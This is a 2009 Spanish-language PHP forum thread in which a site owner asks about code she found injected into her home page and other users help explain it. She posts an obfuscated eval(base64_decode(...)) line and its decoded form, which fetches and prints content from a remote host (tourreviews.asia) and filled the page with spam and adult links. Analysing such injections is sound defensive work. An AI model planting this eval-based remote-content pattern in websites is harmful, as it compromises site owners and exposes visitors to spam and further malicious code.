Ataque eval

JessicaTJ · #1 (**permalink**) 04/11/2009, 10:51

Hola chicos, estaba revisando unos archivos de una web de prueba que estoy realizando y ahora en la mañana mire que tenia esto:

Código PHP:

  <?php 
eval (base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

Y aparte un monton de URLs que llevaban mayormente a sitios de compras y para adultos, podrian plis ayudarme o decirme, que es eso?

Dentro de mi poco conocimiento que tengo en PHP creo que es un ataque verdad? Como podria evitarlos?

Agradecere su ayuda una vez mas chicos

valenti77 · #2 (**permalink**) 04/11/2009, 11:05

La función eval, permite evaluar el contenido de una variable y si es ejecutable, hacerlo.

La funcion Base64_decode decodifica el codigo que aqui se ve a continuación, que esta en base 64.

Conclusión, es un ataque, y vaya a saber que es lo que hace, ya que esta todo codificado. Todas esas letras, son codigo ejecutable codificado. O tal vez tengas suerte y solamente sea un cartel, o simples palabras.

Un saludo!

JessicaTJ · #3 (**permalink**) 04/11/2009, 11:07

Hola valenti77 gracias por tu respuesta.

Decodificado es esto:

Código:

$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){ 
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;

Y no le entiendo xD

Podrias plis decirme, como podria evitar esto para que no vuelva a suceder?
Desde ya agradezco mucho tu ayuda

valenti77 · #4 (**permalink**) 04/11/2009, 12:16

En este momento no tengo tiempo para revisarlo detalladamente, aguantame un rato que le pego una ojeada y te digo aproximadamente.

Saludos!

JessicaTJ · #5 (**permalink**) 04/11/2009, 12:27

Oki, gracias valenti77, entonces te espero

Adell · #6 (**permalink**) 04/11/2009, 13:15

Hola, el ataque ese seguramente te lleva a esa web y por medio de sockets se lleva una cookie o algo la verdad no estoy muy al tanto de CURL.
Lo primero que deberiamos identificar es como se metio ese codigo en tu pagina, alguna vulnerabilidad del ftp, o alguna otra cosa... donde encontraste el codigo ese?
esta en todas las paginas?

saludos

valenti77 · #7 (**permalink**) 04/11/2009, 18:26

Estoy por revisar el codigo, en un momento te digo que obtuve de ahí. Mientras tanto podes investigar lo que dice el amigo Adell.

valenti77 · #8 (**permalink**) 04/11/2009, 18:57

El codigo lo que hace primeramente es fijarse si la libreria "cURL", que es una librería creada por un hombre, permite la transferencia de archivos sea cual sea el protocolo o server.

Si la librería existe(extension_loaded), comienza la sesión cURL, settea todas las opciones a su gusto, mediante CURLOPT_laopcion:

CURLOPT_TIMEOUT, 30 (supongo que 30 segundos de ejecucion de la transferencia)
CURLOPT_RETURNTRANSFER, 1 = Trae la URL como string en vez de mostrarla en pantalla (1 se refiere a verdadero, 0 se refiere a falso)
CURLOPT_URL, $l = Acordate que en $l esta guardada la URL de la pagina, por lo tanto la URL a extraer es: http://tourreviews.asia/links2/link.php

Luego la ejecuta con curl_exec, trae esa pagina, y la muestra.

Si no tenes habilitada la libreria cURL, mediante implode y file, lee la misma pagina, y la trae de todas formas.

Estas en un servidor gratuito? Porque no le veo nada malicioso, lo que si no se es lo que hay en link.php. Supongo que debe ser publicidad metida por el mismo hosting, ya que todo esto lo ejecuta mediante la funcion eval(), y podria pensarse que lo que hace es traer un AD o un banner.
Despues esta el pesimismo, que podria traer mas codigo malicioso en vez de banners.

acoevil · #9 (**permalink**) 04/11/2009, 19:01

Ei, sabes de alguna tecnica para evitar este tipo de ataques.

valenti77 · #10 (**permalink**) 04/11/2009, 23:23

Puedes leerte Este artículo que algo tiene de explicación.

Estos temas de seguridad son demasiado complejos. Es cuestión de probar, prueba y error.

JessicaTJ · #11 (**permalink**) 05/11/2009, 09:49

Hola valenti77 y Adell

Muchisimas gracias por sus respuestas y ayuda.

El codigo lo encontre ayer mismo pero solo en la pagina principal, tenia un monton de links de publicidad que se imprimian en pantalla y tenia la funcion eval.

Ayer lo removi e hice implementaciones de proteccion contra inyecciones SQL.

Espero que con eso y el favor de Dios ya no suceda nada de nuevo. Investigare mas para ver el porke podria haber sucedido.

Mil gracias de nuevo chicos

valenti77 · #12 (**permalink**) 05/11/2009, 12:06

De nada, lo único que ahora Google me marca este tema como "una web atacante", al igual que tu perfil cuando quize mandarte un mensaje comentando esto. Cuando lo vi no lo podía creer.

Tambien podés probar desactivando la librería cURL, si no la vas a utilizar. Aunque eso implica que esté desactivada para todos los usuarios del hosting jaja, si el hosting es tuyo, lo podrias hacer.
Lo mas probable es que quieran usar tu server de zombie, para bajar un servidor mas grande.

Saludos!

JessicaTJ · #13 (**permalink**) 06/11/2009, 12:31

Hola valenti77, sip, parece que los errores son en todo el foro, esta super raro eso.

El servidor es de paga pero compartido, acabo de implementar sistemas de seguridad para tratar de evitar que esto vuelva a suceder.

Mil gracias valenti77